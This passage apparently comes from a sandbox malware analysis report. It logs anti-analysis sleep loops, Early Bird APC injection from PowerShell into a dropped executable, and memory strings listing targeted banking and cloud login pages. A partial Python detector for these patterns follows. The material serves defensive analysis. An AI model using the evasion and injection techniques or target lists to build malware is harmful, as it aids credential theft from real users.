            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599891s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 6556 Thread sleep count: 8486 > 30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 6556 Thread sleep count: 1359 > 30
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599766s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599656s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599547s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599437s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599328s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599109s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -599000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598890s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598781s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598672s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598562s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598453s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598344s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598234s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598124s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -598015s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597891s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597781s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597672s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597562s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597453s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597344s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597109s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -597000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596890s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596780s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596672s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596562s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596453s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596344s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596219s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596109s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300 Thread sleep time: -596000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595890s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595781s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595562s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595453s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595344s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595234s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595125s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594897s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594797s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe TID: 5300Thread sleep time: -594568s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_0040683D FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | Code function: 0_2_0040290B FindFirstFileW
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0040290B FindFirstFileW
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00405C13 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_0040683D FindFirstFileW,FindClose
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599891
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599766
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599656
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599547
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599437
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599328
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598234
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598124
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 598015
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597891
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 597000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596780
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596219
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596109
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 596000
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595890
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595781
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595672
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595562
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595453
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595344
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595234
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595125
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 595015
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 594897
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 594797
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 594687
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 594568
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.00000000034B8000.00000004.00000020.00020000.00000000.sdmp, Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F4A8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $eqEmultipart/form-data; boundary=------------------------8dd3278838ce892<
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3346863955.000000001F540000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: $eqEmultipart/form-data; boundary=------------------------8dd3298cde51afd<
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: powershell.exe, 00000002.00000002.2494742729.000000000557C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3334889586.000000000350D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW(
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: ModuleAnalysisCache.2.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002042F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: Mangedoblende.exe, 00000006.00000002.3348218353.000000002074E000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | API call chain: ExitProcess graph end node (graph_0-3802)
            Source: C:\Users\user\Desktop\fGu8xWoMrg.exe | API call chain: ExitProcess graph end node (graph_0-3806)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Code function: 6_2_00403F64 SetWindowPos,ShowWindow,GetWindowLongW,ShowWindow,DestroyWindow,SetWindowLongW,GetDlgItem,SendMessageW,IsWindowEnabled,SendMessageW,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,SetClassLongW,SendMessageW,GetDlgItem,ShowWindow,EnableWindow,EnableWindow,GetSystemMenu,EnableMenuItem,SendMessageW,SendMessageW,SendMessageW,lstrlenW,SetWindowTextW,DestroyWindow,CreateDialogParamW,GetDlgItem,GetWindowRect,ScreenToClient,SetWindowPos,ShowWindow,DestroyWindow,EndDialog,ShowWindow
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Process token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe base: 16D0000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
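Two of the behaviours listed in this report can be recognised mechanically from the behaviour lines themselves: the run of timed sleeps in Mangedoblende.exe that starts at 600000 (read here as milliseconds, ten minutes, which is what the report's "long sleeps (>= 3 min)" signature keys on) and then shrinks by roughly 110 each time, which is consistent with a loop that re-sleeps the remaining interval after the sandbox has shortened the previous sleep; and the Early Bird sequence just above, where powershell.exe creates Mangedoblende.exe, writes into it and queues an APC to it before the process is resumed. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it parses lines in the "Source: <process> | <observation>" form used on this page and reports both patterns. The sample lines are constructed from observations listed in this report; the 3-minute threshold, the treatment of 922337203685477 as an indefinite wait rather than a timed sleep, and the "re-sleep loop" reading of a strictly decreasing delay series are this example's own assumptions.

```python
"""Heuristics over sandbox behaviour lines ("Source: <process> | <observation>").

Added example for this page, not code from the Joe Sandbox report or the sample.
It flags a strictly decreasing series of long timed sleeps (read as a loop that
re-sleeps the remaining interval) and the Early Bird sequence of process
creation, memory write and APC queue from one process into another.
"""
import re
from collections import defaultdict

# Constructed sample lines, taken from observations listed in this report.
SAMPLE_LINES = r'''
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599766
Source: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe | Thread delayed: delay time: 599656
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe base: 16D0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\Mangedoblende.exe "C:\Users\user\AppData\Local\Temp\Mangedoblende.exe"
'''.strip().splitlines()

LINE_RE = re.compile(r"^Source:\s*(?P<source>.+?)\s*\|\s*(?P<obs>.+)$")
DELAY_RE = re.compile(r"Thread delayed: delay time: (\d+)")
PATH_RE = re.compile(r'[A-Za-z]:\\[^\s"]+\.exe')
# 2**63 // 10000, i.e. the largest 100 ns interval expressed in ms. Treated here
# (an assumption of this example) as an indefinite wait, not a timed sleep.
INFINITE_DELAY_MS = 922337203685477
LONG_SLEEP_MS = 3 * 60 * 1000  # the report's ">= 3 min" long-sleep threshold
EARLY_BIRD_STEPS = ("Process created", "Memory written", "Thread APC queued")


def parse(lines):
    """Return (source, observation) pairs; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group("source"), m.group("obs")))
    return events


def sleep_profile(events):
    """Per source: number of timed sleeps, the longest one, whether the series is
    strictly decreasing (re-sleep loop) and whether any sleep is a long sleep."""
    delays = defaultdict(list)
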